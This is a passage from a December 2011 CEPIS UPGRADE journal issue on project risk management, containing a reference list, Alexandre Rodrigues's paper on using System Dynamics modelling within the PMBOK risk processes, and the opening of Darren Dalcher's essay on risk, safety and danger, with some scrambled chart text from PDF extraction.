cost overrun in transport infrastructure projects? Transport Reviews, 24(1), pp. 3-18, 2004.
[3] B. Flyvbjerg, M.K.S. Holm. How inaccurate are demand forecasts in public works projects? Journal of
the American Planning Association, vol. 78, no. 2, pp.
131-146, 2005.
[4] L. Virine, L. Trumper. Project Decisions. The Art and
Farewell Edition
© Novática
Risk Management
Science. Management Concepts. Vienna.VA, 2007,
[5] R. Buehler, D. Griffin, M. Ross. Exploring the "planning fallacy": Why people underestimate their task
completion times. Journal of Personality and Social
Psychology, 67, 366-381, 1994.
[6] D. Lovallo, D. Kahneman. Delusions of success: how
optimism undermines executives’ decisions, Harvard
Business Review, July Issue, pp. 56-63, 2003.
[7] A. Tversky, D. Kahneman. Judgment Under Uncertainty: Heuristics and biases. Science, 185, 1124-1130,
74.
[8] G.E. McCray, R.L. Purvis, C.G. McCray. Project Management Under Uncertainties: The Impact of Heuristics and Biases. Project Management Journal. Vol. 33,
No. 1. 49-57, 2002.
[9] A. Tversky, D. Kahneman. Availability: A heuristic for
judging frequency and probability. Cognitive Physiology, 5, 207-232, 1973.
[10] J.S. Carroll. The effect of imagining an event on expectations for the event: An interpretation in terms of
availability heuristic. Journal of Experimental Psychology, 17, 88-96, 1978.
[11] D. Cervone, P.K. Peake. Anchoring, efficacy, and action: The influence of judgmental heuristics of selfefficacy judgments. Journal of Personality and Social
Psychology, 50, 492-501, 1986.
[12] S. Plous. The Psychology of Judgment and Decision
Making, McGraw-Hill, 1993.
[13] P.C. Watson. On the failure to eliminate hypotheses in
a conceptual task. Quarterly Journal of Experimental
Psychology, 12, 129-140, 1960.
[14] J. St. B. T. Evans, J.L. Barston, P. Pollard. On the conflict between logic and belief in syllogistic reasoning.
Memory and Cognition, 11, 295-306, 1983.
[15] R.K. Wysocki, R. McGary. Effective Project Management: Traditional, Adaptive, Extreme, 3rd Edition, John
Wiley & Sons Canada, Ltd., 2003.
[16] Project Management Institute. A Guide to the Project
Management Body of Knowledge (PMBOK® Guide),
Fourth Edition, Newtown Square, PA: Project Management Institute, 2008.
[17] Clemen, R. T., (1996). Making Hard Decisions, Brooks/
Cole Publishing Company, 2nd ed., Pacific Grove, CA
[18] G.W. Hill. Group versus individual performance: Are
N + 1 heads better than one? Psychological Bulletin,
91, 517-539, 1982.
[19] D. Hillson. Use a risk breakdown structure (RBS) to
understand your risks. In Proceedings of the Project
Management Institute Annual Seminars & Symposium,
October 3-10, 2002, San Antonio, TX, 2002.
[20] T. Kendrick. Identifying and Managing Project Risk:
Essential Tools For Failure-Proofing Your Project,
AMACOM, a division of American Management Association, 2nd revised Edition. New York, 2009.
[21] W. Scheinin, R. Hefner. A Comprehensive Survey of
Risk Sources and Categories, In Proceedings of Space
Systems Engineering and Risk Management Symposiums. Los Angeles, CA: pp. 337-350, 2005.
© Novática
Farewell Edition
[22] D.T. Hulett. Schedule risk analysis simplified, PM
Network, July 1996, 23-30, 1996.
[23] D.T. Hulett. Project Schedule Risk Analysis: Monte
Carlo Simulation or PERT?"PM Network, February
2000, p. 43, 2000.
[24] J. Goodpasture. Quantitative Methods in Project Management, J.Ross Publishing, Boca Raton, FL, 2004.
[25] J. Schuyler. Risk and Decision Analysis in Projects,
2nd Edition, Project Management Institute, Newton
Square, PA, 2001.
[26] T. Williams. Why Monte Carlo simulations of project
networks can mislead. Project Management Journal,
September 2004, 53-61, 2004.
[27] G.A. Quattrone, C.P. Lawrence, D.L. Warren, K.
Souze-Silva, S.E. Finkel, D.E. Andrus. Explorations
in anchoring: The effects of prior range, anchor extremity, and suggestive hints. Unpublished manuscript.
Stanford University, Stanford, 1984.
[28] D.T. Hulett. Practical Schedule Risk Analysis. Gower
Publishing, 2009.
[29] D.T. Hulett. Integrated Cost-Schedule Risk Analysis.
Gower Publishing, 2011.
[30] E. Goldratt. Critical Chain. Great Barrington, MA:
North River Press, 1997.
[31] M. Srinivasan, W. Best, S. Chandrasekaran. Warner
Robins Air Logistics Center Streamlines Aircraft Repair and Overhaul. Interfaces, 37(1). 7-21, 2007.
[32] P. Wilson, S. Holt. Lean and Six Sigma — A Continuous Improvement Framework: Applying Lean, Six
Sigma, and the Theory of Constraints to Improve
Project Management Performance. In Proceedings of
the 2007 PMI College of Scheduling Conference, April
15-18, Vancouver, BC, 2007.
[33] D.T. Hulett, D. Hillson. Branching out: decision trees
offer a realistic approach to risk analysis, PM Network,
May 2006, pp 36-40, 2006.
[34] J. Arlow, I. Neustadt. Enterprise Patterns and MDA:
Building Better Software with Archetype Patterns and
UML. Addison –Wesley Professional, 2003.
[35] G. Booch, J. Rumbaugh , I. Jacobson. The Unified
Modeling Language User Guide, Addison –Wesley
Professional; 2nd edition, 2005
[36] B. Flyvbjerg. From Nobel Prize to project management: getting risks right. Project Management Journal, August 2006, pp 5-15, 2006.
[37] R. Shankar. Principles of Quantum Mechanics, Second Edition, New York: Springer, 1994.
[38] E.B. Manoukian. Quantum Theory: A Wide Spectrum.
New York: Springer, 2006.
[39] M. Fowler. Patterns of Enterprise Application Architecture, Addison-Wesley Professional, 2002.
[40] R.C. Martin. Agile Software Development, Principles,
Patterns, and Practices. Prentice Hall, 2002.
[41] Project Management Institute. A Guide to the project
management body of knowledge (PMBOK). Newtown
Square, PA. Project Management Institute, Inc., 2004.
[42] A. Tversky, D. Kahneman. Belief in the law of small
numbers. Psychological Bulletin, 76, 105-110, 1971.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
33
Risk Management
Revisiting Managing and Modelling of Project Risk Dynamics
— A System Dynamics-based Framework1
Alexandre Rodrigues
The fast changing environment and the complexity of projects has increased the exposure to risk. The PMBOK (Project
Management Body of Knowledge) standard from the Project Management Institute (PMI) proposes a structured risk
management process, integrated within the overall project management framework. However, unresolved difficulties call
for further developments in the field. In projects, risks occur within a complex web of numerous interconnected causes and
effects, which generate closed chains of feedback. Project risk dynamics are difficult to understand and control and hence
not all types of tools and techniques are appropriate to address their systemic nature. As a proven approach to project
management, System Dynamics (SD) provides this alternative view. A methodology to integrate the use of SD within the
established project management process has been proposed by the author. In this paper, this is further extended to integrate the use of SD modelling within the PMBOK risk management process, providing a useful framework for the effective
management project risk dynamics.
Keywords: PMBOK Framework, Project Management
Body of Knowledge, Project Risk Dynamics, Risk Management Processes, SYDPIM methodology, System Dynamics.
Author
Alexandre Rodrigues is an Executive Partner of PMO Projects
Group, an international consulting firm based in Lisbon
specialized in project management, with operations and offices
in the UK, Africa and South America. He is also a senior
consultant with the Cutter Consortium. Dr. Rodrigues is PM
Ambassador TM and International Correspondent for the
international PMForum. He was the founding President of the
PMI Portugal Chapter and served as PMI Chapter Mentor for
four years. He was an active member of the PMI teams that
developed the 3rd edition of the PMBOK® Guide and the
OPM3® model for organizational maturity assessment. He was
a core team member for the PMI Practice Standard for Earned
Value Management, which has just been released. He holds a
PhD from the University of Strathclyde (UK), specializing in
the application of System Dynamics to Project Management.
<[email protected]>
1 Risk Management in Projects
1.1 Overview
In response to the growing uncertainty in modern
projects, over the last decade the project management community has developed project-specific risk management
frameworks. The last edition of PMI’s body of knowledge
(the PMBOK® Guide [1]), presents perhaps the most complete and commonly accepted framework, which has been
further detailed in the Practice Standard for Project Risk
Management [2]. Further developments complement this
framework like the establishment of project risk management maturity models to help organizations evaluate and
improve their ability to control risks in projects. However,
most organizations still fall short of implementing these
structured frameworks effectively. In addition, there are certain types of risks that are not handled properly by the traditional tools and techniques proposed.
1.2 Current Framework for Project Risk Management
The fourth and latest edition of PMI’s Project Management Body of Knowledge [1] considers six risk management processes: plan risk management, identify risks, perform qualitative risk analysis, perform quantitative risk
analysis, plan risk responses, and monitor and control risks.
While this framework provides a comprehensive approach
to problem solving, its effectiveness relies on the ability of
these processes to cope with the multidimensional uncertainty of risks: identification, likelihood, impact, and occurrence. The majority of the traditional tools and techniques
used in these processes were not designed to address the
increasingly systemic nature of risk uncertainty in modern
34
CEPIS UPGRADE Vol. XII, No. 5, December 2011
projects. This problem and limitation calls for further developments in the field.
1.3 Project Risk Dynamics
Risks are dynamic events. Overruns, slippage and other
problems can rarely be traced back to the occurrence of a
single discrete event in time. In projects, risks take place
within a complex web of numerous interconnected causes
1
This paper derives from an article entitled "Managing and Modelling Project Risk Dynamics - A System Dynamics-based Framework" which was presented by the author at the Fourth European
Project Management Conference, PMI Europe 2001 [3]. As the
use of computer simulation based on System Dynamics to support Project Risk Management in a systematic manner is still in its
early phases, most likely due to the high level of organizational
maturity and expertise required by Systems Dynamics modelling,
the author decided revisit the ideas contained in the aforementioned paper.
Farewell Edition
© Novática
Risk Management
Figure 1: Example of a Project Feedback Structure focused on Scope Changes.
and effects which generate closed chains of causal feedback.
Risk dynamics are generated by the various feedback loops
that take place within the project system.
The feedback perspective is particularly relevant to understand, explain, and act upon the behaviour of complex
social systems. Its added value for risk management is that
it sheds light on the systemic nature of risks. No single factor can be blamed for generating a risk nor can management
find effective solutions by acting only upon individual factors. To understand why risks emerge and to devise effective solutions, management needs to look at the whole. As
an example of this analysis, Figure 1 shows the feedback
structure of a project, focused on the dynamics that can generate risks related to requirements changes imposed by the
client. This understanding of risks is crucial for identifying,
assessing, monitoring and controlling them better (see [4]
for more details).
Feedback loops identified as "R+" are reinforcing effects (commonly referred to as "snowball effects"), and the
ones identified as "B-" are balancing effects (e.g. control
“
decisions). The arrows indicate cause-effect relationships,
and have an "o" when the cause and the direct effect change
in the opposite direction. The arrows in red identify the
cause-effect relationships likely to generate risks. This type
of diagram is referred to as "Influence Diagram" (ID).
If we ask the question: what caused quality problems
and delays? the right answer is not "staff fatigue", "poor
QA implementation" or "schedule pressure". It is the whole
feedback structure that, over-time and under certain conditions, generated the quality problems and delays. In other
words, the feedback structure causes problems to unfold
over-time. To manage systemic risks effectively, it is necessary to act upon this structure. This type of action consists of eliminating problematic feedback loops and creating beneficial ones.
However, project risk dynamics are difficult to understand and control. The major difficulties have to do with
the subjective, dynamic and multi-factor nature of systemic
risks. Feedback effects include time-delays, non-linear effects and subjective factors. Not all types of tools and tech-
The fast changing environment and the complexity
of projects has increased the exposure to risk
© Novática
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
35
Risk Management
“
Project risk dynamics are difficult to understand and control
and hence not all types of tools and techniques
are appropriate to address their systemic nature
”
niques are appropriate to address and model problems of
this nature. The more classical modelling approaches tend
to deliver static views based on top-down decomposition
and bottom-up forecast, while focusing on the readily quantifiable factors. Managing project risk dynamics requires a
different approach, based on a systemic and holistic perspective, capable of capturing feedback and of quantifying
the subjective factors where relevant.
2 A Proposed Framework for Managing and Modelling Project Risk Dynamics
2.1 Overview
Managing systemic risks requires an approach supported
by specialized tools and techniques. System Dynamics (SD)
is a simulation modelling approach aimed at analysing the
systemic behaviour of complex social systems, such as
projects. The framework proposed here is based on the integrated use of SD within the existing project risk management framework, supporting the six risk management processes proposed by the PMBOK [1]. This is an extension to
the more general methodology developed by the author,
called SYDPIM [5], which integrates the use of SD within
the generic project management framework. The use of SD
is proposed as a complementary tool and technique to address systemic risks.
2.2 System Dynamics
SD was developed in the late 50s [6] and has enjoyed a
sharp increase in popularity in the last ten years. Its applica-
Schedule
2: Estimated Cost
3: Designs Completed
5:Errors to rework
4: Cum Changes
00
00
00
00
00
00
1
3: Designs Completed
2
1
1
2
3
2
2
2
3
3
4
0.00
5
30.00
4
4
5
5
.00
.00
5:Errors to rework
3
3
.00
.00
4: Cum Changes
1
1:
60.00
2:
250.00
3:
3000.00
4:
5:
250.00
2
00
2: Estimated Cost
1
1
3
2
2
The SYDPIM methodology integrates the use of SD
modelling within the established project management process. A detailed description can be found in [5] (see also [9]
for a summary description). SYDPIM comprises two main
methods: the model development method and the project
management method. The first is aimed at supporting the
development of valid SD models for a specific project. The
latter supports the use of this model embedded within the
1:
120.00
2:
500.00
3: 6000.00
4:
5:
500.00
3
1
3 The SYDPIM Framework
1: Actual Schedule
00
1
tion to project management has also been growing impressively, with numerous successful applications to real life
projects [7]. An overview of the SD methodology can be
found in [5] and [8].
The SD modelling process starts with the development
of qualitative influence diagrams and then moves into the
development of quantitative simulations models. These
models allow for a flexible representation of complex scenarios, like mixing the occurrence of various risks with the
implementation of mitigating actions. The model simulation generates patterns of behaviour over-time. Figure 2 provides an example of the output produced by an SD project
model, when simulating the design phase of a software
project under two different scenarios.
SD models work as experimental management laboratories, wherein decisions can be devised and tested in a safe
environment. Their feedback perspective and "what-if" capability provide a powerful means through which systemic
problems can be identified, understood and managed.
4
4
60.00
Time
5
90.00
4
5
120.00
(a) Simulation “as planned”
1:
2:
3:
4:
5:
0.00
0.00
5
3
0.00
0.00
4
0.00
5
30.00
4
60.00
Time
Time
5
120.00
90.00
(b) Simulation “with scope changes”
Figure 2: Example of Behaviour Patterns produced by an SD Project Model.
36
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Figure 3: Overview of the SYDPIM Process Logic.
traditional project management framework, and formally
integrated with the PERT/CPM models. An overview of the
process logic is provided in Figure 3. The arrows in black
identify the flows within the traditional project control process. SYDPIM places the use of an SD project model at the
core of this process, enhancing both planning and monitoring and thereby the overall project control.
The use of the SD model adds new steps to the basic
control cycle (the numbers indicate the sequence of the
steps). In planning, the SD model is used to pro-actively
test and improve the current project plan. This includes forecasting and diagnosing the likely outcome of the current
plan, uncover assumptions (e.g. expected productivity), test
the plan’s sensitivity to risks, and test the effectiveness of
mitigating actions. In monitoring, the SD model is used to
explain the current project outcome and status, to enhance
progress visibility by uncovering important intangible information (e.g. undiscovered rework), and to carry out retrospective "what-if" analysis for process improvement while
the project is underway. Overall, the SD model works as a
test laboratory to assess the future plans and to diagnose the
project past. The model also works as an important repository of project history and metrics.
4 Using SYDPIM to manage Risk Dynamics within
the PMBOK Framework
According to the SYDPIM framework, the SD model
can be used in various ways to support the six risk manage-
“
ment processes identified in the PMBOK. Given the limited size of this paper, this is now briefly described separately for each risk process. A more detailed explanation is
forthcoming in the literature.
Plan Risk Management
The implementation of SYDPIM within risk management planning allows for the definition of the appropriate
level of structuring for the risk management activity, and
for the planning of the use of SD models within this activity.
Adjusting the level of structuring for the risk management activity is crucial for the practical implementation of
the risk management process. An SD project model can be
used to analyse this problem. Various scenarios reflecting
different levels of structuring can be simulated and the full
impacts are quantified. Typically, a "U-curve" will result
from the analysis of these scenarios, ranging from pure ad
hoc to over-structuring. An example of the use of an SD
model for this purpose can be found in [3].
Identify Risks
An SD project model can support risk identification in
two ways: at the qualitative level, through the analysis of
influence diagrams, risks that result from feedback forces
can be identified; at the quantitative level, intangible project
status information (e.g. undiscovered rework) and assumptions in the project plan can be uncovered (e.g. required
productivity).
System Dynamics modelling is a very
complete technique and tool that covers a wide range
of project management needs
© Novática
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
37
Risk Management
“
System Dynamics modelling
is proposed in the specialized
Practice Standard for
Project Risk Management
”
Risks can be identified in an influence diagram as events
that result from: (i) balancing loops that limit a desired
growth or decay (e.g. the lack of available resources leads
to a balancing loop that limits the potential growth of work
accomplishment); (ii) reinforcing loops that lead to undesired growth or decay (e.g. schedule pressure leads to QA
cuts, which in turn lead to more rework and delays, thereby
reinforcing schedule pressure; see "R+" loop L3 in figure
1); (iii) external factors that exacerbate any of these two
types of feedback loops (e.g. training delays exacerbate the
following reinforcing loop: "the more you hire in the later
stages, the worst the slippage due to training overheads.").
This type of analysis also allows for risks to be managed as
opportunities: feedback loops can be put to work in favour
of the project.
SD simulation models allow the project manager to
check whether and how certain feedback loops previously
identified as "risk generators" will affect the project. In this
way, irrelevant risks can be eliminated, preventing unnecessary mitigating efforts. Secondly, the calibration of the
SD model uncovers important quantitative information
about the project status and past, which typically is not
measured because of its intangible and subjective nature.
In this way, it forces planning assumptions to be made explicit and thereby identifying potential risks.
Perform Qualitative Risk Analysis
Influence diagrams can help to assess risk probability
and impacts through feedback loop analysis. Given a specific risk, it is possible to identify in the diagram which
feedback loops favour or counter the occurrence of the risk.
Each feedback loop can be seen as a dynamic force that
pushes the project outcome towards (or away) from the risk
occurrence. The likelihood and the impact of each risk can
be qualitatively inferred from this feedback loop analysis.
An SD simulation model can be used to identify the specific scenarios in which a risk would occur (i.e. likelihood).
Regarding impact, with simple models and preliminary calibrations, quantitative estimates can be taken as qualitative
indications of the order of magnitude of the risk impacts.
Perform Quantitative Risk Analysis
In quantifying risks, an SD project model provides two
additional benefits over traditional models: first, it delivers
a wide range of estimates, and secondly these estimates reflect the full impacts of risk occurrence, including both direct and indirect effects.
38
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Quantifying the impact of a risk consists in calibrating
the model for a scenario where the risk occurs (e.g. scope
changes), and then simulate the project. One can virtually
analyse the impact of the risk occurrence in any project variable, by comparing the produced behaviour pattern with
the one obtained when a risk-absent scenario is simulated.
For example, figure 2(b) shows the behaviour patterns produced by an SD project model when scope changes are introduced by the client over-time (curve 4). These patterns
can be compared with the ones of figure 2(a), which shows
the scenario where no scope changes are introduced. This
type of analysis allows the project manager to identify a
risk’s impact on various aspects of the project (and overtime; not just the final value). In addition, the feedback nature of the SD model ensures that both direct and indirect
impacts of risks are quantified – ultimately, when a risk occurs it will affect everything in the project, and the SD model
captures the full impacts.
An SD project model generally includes variables related to the various project objectives (cost, time, quality,
and scope). One can therefore assess the risk impacts on all
dimensions of the project objectives. The SD model also
allows for scenarios combining several risks to be simulated, whereby their cross impacts are also captured. Sensitivity analysis can be carried out to analyse the project’s
sensitivity to certain risks as well as to their intensity (e.g.
what is the critical productivity level below which problems will escalate?).
Plan Risk Responses
Influence diagrams and SD simulation models are very
powerful tools to support the development of effective risk
responses. They provide three main distinctive benefits: (i)
support the definition and testing of complex risk-response
scenarios, (ii) provide the feedback perspective for the identification of response opportunities, and (iii) they are very
effective for diagnosing and understanding better the multifactor causes of risks; these causes can be traced back the
through the chains of cause-and-effect, with counter-intuitive solutions often being identified.
Influence diagrams provide the complementary feedback
perspective. Therefore, the power to influence, change and
improve results rests on acting on the project feedback structure. Risk responses can be identified as actions that eliminate vicious loops, or attenuate or reverse their influence
on the project behaviour. By looking at the feedback loops
and external factors identified as risks, the project manager
can devise effective responses.
“
PMI’s Project Management
Body of Knowledge
considers six risk
management processes
”
Farewell Edition
© Novática
Risk Management
“
By implementing the SYDPIM-based risk framework,
the project manager can take better advantage
of the benefits offered by System Dynamics modelling
An SD simulation model provides a powerful test-bed
where, at low cost and in a safe environment, various riskresponses can be developed, their effectiveness can be tested
for the full impacts and can be improved prior to implementation.
Risk Monitoring and Control
An SD project model can be used as an effective tool for
risk monitoring and control. The model can be used to identify early signs of risk emergence which otherwise would
remain unperceived until problems were aggravated. The
implementation of risks responses can also be monitored
and their effectiveness can be evaluated.
Risk occurrence can be monitored by analysing the
project behavioural aspects of concern (i.e. the risks "symptoms"). An SD model has the ability to produce many of
these patterns, which in the real world are not quantified
due to their intangible and subjective nature (the amount of
undetected defects flowing throughout the development lifecycle is a typical example). The SD model provides a wide
range of additional risk triggers, thereby enhancing the effectiveness of monitoring risk occurrence.
The implementation of a risk response can be characterized by changes in project behaviour. These changes can be
monitored in the model to check whether the responses are
being implemented as planned. The effectiveness of the risk
response (i.e. the expected impacts) can be monitored in the
same way. When deviations occur, the SD model can be
used to diagnose why the results are not as expected.
5 Placing System Dynamics in the PMBOK
Framework
System Dynamics modelling is a very complete technique and tool that covers a wide range of project management needs by addressing the systemic issues that influence
and often dominate the project outcome. Its feedback and
endogenous perspective of problems is very powerful, widening the range for devising effective management solutions.
It is an appropriate approach to manage and model project
risk dynamics, for which most of the traditional modelling
techniques are inappropriate. SD therefore has a strong potential to provide a number of distinctive benefits to the
overall project management process. One of the necessary
conditions is that its application is integrated with the traditional models within that process. The SYDPIM methodology was developed for that purpose, integrating the use of
SD project models with the traditional PERT/CPM models,
based on the WBS and OBS structures [5]. SYDPIM provides SD models with specific roles within the project con-
© Novática
Farewell Edition
”
trol process. One of these roles is to support the risk management activity.
As a proven tool and technique already applied with
success to various real projects [10], SD needs to be properly placed in the PMBOK. This paper briefly discussed its
potential roles within the six project risk management processes presented in the latest edition of the PMBOK [1]. It is
concluded that SD has potential to provide added value to
these processes, in particular to risk identification, risk quantification and to response planning.
Influence diagrams are already proposed by the PMBOK
for risk identification (process 11.2). System Dynamics
modelling is further proposed in the specialized Practice
Standard for Project Risk Management [1] (PMI 2008), also
for risk identification. This is an important acknowledgement that systemic problems in projects may require specialized techniques, different from and complementary to
the more traditional ones. However, from practical experience in real projects and extensive research carried out in
this field, it is the author’s opinion that the range of application of SD within the project management process is much
wider. There are many other processes in the PMBOK
framework where SD can be employed as a useful tool and
technique. These benefits can be maximized based on the
SYDPIM methodology.
It is also the author’s opinion that by implementing the
SYDPIM-based risk framework proposed here, the project
manager can take better advantage of the benefits offered
by System Dynamics modelling, while enhancing the performance of the existing risk management process.
The use of System Dynamics in the field of Project Management and in particular for Project Risk Management has
been deserving growing attention since the author first proposed an integrated process based approach [3], as reported
in the literature.
References
[1] Project Management Institute (PMI). A Guide to the
Project Management Body of Knowledge, Project
Management Institute, North Carolina, 2008.
[2] Project Management Institute (PMI). Practice Standard for Project Risk Management, Project Management
Institute, North Carolina, 2009.
[3] A. Rodrigues. "Managing and Modelling Project Risk
Dynamics - A System Dynamics-based Framework ".
Proceedings of the 4th European PMI Conference 2001,
London, United Kingdom, 2001.
[4] A.G. Rodrigues. "Finding a common language for global software projects." Cutter IT Journal, 1999.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
39
Risk Management
[5] A. Rodrigues. "The Application of System Dynamics
to Project Management: An Integrated Methodology
(SYDPIM)". PhD Dissertation Thesis. Department of
Management Sciences, University of Strathclyde, 2000.
[6] J. Forrester. Industrial Dynamics, MIT Press, Cambridge, US, 1961.
[7] A. Rodrigues. "The Role of System Dynamics in
Project Management: A Comparative Analysis with
Traditional Models." 1994 International System Dynamics Conference, Stirling, Scotland, 214-225, 1994.
[8] M.J. Radzicki and R. Taylor. "Origin of System Dynamics: Jay W. Forrester and the History of System
Dynamics". In: U.S. Department of Energy’s Introduction to System Dynamics. Retrieved 23 October 2008.
[9] A. Rodrigues. "SYDPIM – A System Dynamics-based
Project-management Integrated Methodology." 1997
International System Dynamics Conference: "Systems
Approach to Learning and Education into the 21st Century", Istanbul, Turkey, 439-442, 1997.
[10] A.G. Rodrigues, J. Bowers. "The role of system dynamics in project management." International Journal
of Project Management, 14(4), 235-247, 1996.
Additional Related Literature
„
C. Pavlovski, B. Moore, B. Johnson, R. Cattanach, K.
Hambling, S. Maclean. "Project Risk Forecasting
Method." International Conference on Software Development (SWDC-REK), University of Iceland, Reykjavik, Iceland. May 27 - June 1, 2005.
„
D.A. Hillson. "Towards a Risk Maturity Model." International Journal of Project & Business Risk Management, 1(1), 35-45, 1997.
„
J. Morecroft. "Strategic Modelling and Business Dynamics: A Feedback Systems Approach." John Wiley
& Sons. ISBN 0470012862, 2007.
„
A.G. Rodrigues, T.M. Williams. "System dynamics in
project management: assessing the impacts of client
behaviour on project performance." Journal of the Operational Research Society, Volume 49, Number 1, 1
January 1998, pp 2-15(14).
„
Seng Chia. "Risk Assessment Framework for Project
Management." Engineering Management Conference,
2006 IEEE International. Print ISBN: 1-4244-0285-9.
„
P. Senge. "The Fifth Discipline. Currency." ISBN 0385-26095-4, 1990.
„
J. D. Sterman. "Business Dynamics: Systems thinking
and modeling for a complex world." McGraw Hill.
ISBN 0-07-231135-5, 2000.
„
J.R. Wirthlin. "Identifying Enterprise Leverage Points
in Defense Acquisition Program Performance." Doctoral Thesis, MIT, Cambridge, USA, 2009.
40
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Towards a New Perspective: Balancing Risk, Safety and Danger
Darren Dalcher
The management of risk has gradually emerged as a normal activity that is now a constituent part of many professions.
The concept of risk has become so ubiquitous that we continually search for risk-based explanations of the world around
us. Decisions and projects are often viewed through the lens of risk to determine progress, value and utility. But risk can
have more than one face depending on the stance that we adopt. The article looks at the implications of adopting different
positions regarding risk thereby opening a wider discussion about the links to danger and safety. In rethinking our position, we are able to appraise the different strategies that are available and reason about the need to adopt a more balanced position as an essential step towards developing a better informed perspective for managing risk and potential.
Keywords: Anticipation, Danger, Resilience, Risk, Risk
Management, Safety.
Introduction
Imagine a clash between two worlds, one that is riskaverse, traditional and conservative, the other that is riskseeking, opportunistic and entrepreneurial. The former is
the old world, dedicated to the precautionary principle parading under the banner ‘better safe than sorry’. The latter
is the new world, committed to the maxim ‘no pain, no gain’.
The question we are asked to address is whether the defensive posture exhibited by the old world or the forever offensive stance of the new world is likely to prevail.
Would their attitude to risk determine the outcome of
this question? The answer must be a qualified yes. The notion of risk has become topical and pervasive in many contexts. Indeed Beck [1] argues that risk has become a dominant feature of society, and that it has replaced wealth production as the means of measuring decisions.
In that Case, let’s survey the Combatants
Encamped on one bank, the old world is likely to resist
the temptation of genetically modified crops and hormoneinduced products despite the advertised potential benefits.
Risk is traditionally perceived as negative quantity, danger,
hazard or potential harm. Much of risk management is predicated around the concept of the precautionary principle,
asserting that acting in anticipation of the worst form of
harm should ensure that it does not materialise. Action is
therefore biased towards addressing certain forms of risk
that are perceived as particularly unacceptable and preventing them from occurring, even if scientific proof of the effects is not fully established. According to this principle,
old-world risk regulators cannot afford to take a chance with
some (normally highly political) risks.
“
Author
Darren Dalcher – PhD (Lond) HonFAPM, FBCS, CITP, FCMI
– is a Professor of Software Project Management at Middlesex
University, UK, and Visiting Professor in Computer Science in
the University of Iceland. He is the founder and Director of the
National Centre for Project Management. He has been named
by the Association for Project Management, APM, as one of the
top 10 "movers and shapers" in project management and has
also been voted Project Magazine’s Academic of the Year for
his contribution in "integrating and weaving academic work with
practice". Following industrial and consultancy experience in
managing IT projects, Professor Dalcher gained his PhD in Software Engineering from King’s College, University of London,
UK. Professor Dalcher is active in numerous international
committees, steering groups and editorial boards. He is heavily
involved in organising international conferences, and has
delivered many keynote addresses and tutorials. He has written
over 150 papers and book chapters on project management and
software engineering. He is Editor-in-Chief of Software Process
Improvement and Practice, an international journal focusing on
capability, maturity, growth and improvement. He is the editor
of a major new book series, Advances in Project Management,
published by Gower Publishing. His research interests are wide
and include many aspects of project management. He works
with many major industrial and commercial organisations and
government bodies in the UK and beyond. Professor Dalcher is
an invited Honorary Fellow of the Association for Project
Management (APM), a Chartered Fellow of the British Computer
Society (BCS), a Fellow of the Chartered Management Institute,
and a Member of the Project Management Institute, the Academy
of Management, the IEEE and the ACM. He has received an
Honorary Fellowship of the APM, "a prestigious honour
bestowed only on those who have made outstanding
contributions to project management", at the 2011 APM Awards
Evening. <[email protected]>
The concept of risk has become so ubiquitous that we continually
search for risk-based explanations of the world around us
© Novática
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
41
Risk Management
Old-world thinking supports the adoption of precautionary measures even when some cause and effect relationships
are not fully understood. In others words, the principle links
hazards or threats with (scientific) uncertainty to demand
defensive measures. Following the lead offered by the legal
systems of Germany, Sweden and Denmark, the precautionary principle is likely to be fully embraced in guiding European Commission policy (such as the White Paper on Food
Safety published by the Commission in 2000). When followed to the extreme, this policy leads to the pursuit of a
zero-risk approach, which like zero defects will remain elusive.
Amassed opposite is the new world, where risks convey
potential, opportunity and innovation. Risk offers the potential for gains, and occasionally creative chances and opportunities to discover new patterns of behaviour that can
lead to serious advantage over the competition. Risk thus
offers a key source of innovation. This can be viewed as the
aggressive entrepreneurial approach to business.
Who would you bet your Money on?
In the old-world camp, risk management is a disciplined
way of analysing risk and safety problems in well defined
domains. The difficulty lies in the mix of complexity, ambiguity and uncertainty with human values where problems
are not amenable to old-world technical solutions. Newworld problems manifest themselves as human interactions
with systems. They are complex, vexing socio-technical dilemmas involving multiple participants with competing interests and conflicting values (read that as opportunities)
A ground rule for the clash is that total elimination of
risk is both impossible and undesirable. It is a natural human tendency to try to eliminate a given risk; however that
may increase other risks or introduce new ones. Furthermore, the risks one is likely to attempt to eliminate are the
better-known risks that must have occurred in the past and
about which more is known. Given that elimination is not
an option, we are forced into a more visible coexistence with
risks and their implications. The rest of this article will focus on the dynamic relationship between safety, risk and
danger as an alternative way of viewing the risk–opportunity spectrum. It will therefore help to map, and potentially
resolve, the roots of the clash from an alternative perspective.
Away with Danger?
The old world equates risk with danger, in an attempt to
achieve a safer environment. If only it were that simple!
Safety may result from the experience of danger. Early programmes, models and inventions are fraught with problems.
Experience accumulates through interaction with and resolution of these problems. Trial and error leads to the ability
to reduce error. Eliminate all errors and you reduce the opportunity for true reflective learning.
Safety, be it in air traffic control systems, business environments, manufacturing or elsewhere, is normally achieved
through the accumulated experience of taking risks. In the
42
CEPIS UPGRADE Vol. XII, No. 5, December 2011
old world, the ability to know how to reduce risks inevitably grows out of historical interaction with risk. Solutions
are shaped by past problems. Without taking risk to know
how to reduce risks, you would not know which solutions
are safe or useful.
What happens when a risk is actually reduced? Experience reveals that safety also comes with a price. As we feel
safe, we tend to take more chances and attract new dangers. Research shows that the generation of added safety,
through safety belts in cars or helmets in sport, encourages
danger-courting behaviour, leading often to a net increase
in overall risk taking. This may be explained by the reduced incentive to avoid a risk, once protection against it
has been obtained.
Adding safety measures also adds to the overall complexity of the design process and the designed system, and
to the number of interactions, thereby increasing the difficulty of understanding them and the likelihood of accidents
and errors. In some computer systems, adding safety devices may likewise decrease the overall level of safety. The
more interconnected the technology and the greater the
number of components, the greater the potential for components to affect each other unexpectedly and to spread
problems, and the greater the number of potential ways for
something to go wrong.
So far we have observed that risk and danger maintain
a paradoxical relationship, where risks can improve safety
and safety measures can increase risks. Danger and benefits are intertwined in complex ways ensuring that safety
always comes at a price. Safety, like risk, depends on the
perception of participants.
Predicting Danger
The mitigation of risk, as practised in the old world, is
typically predicated on the assumption of anticipation. It
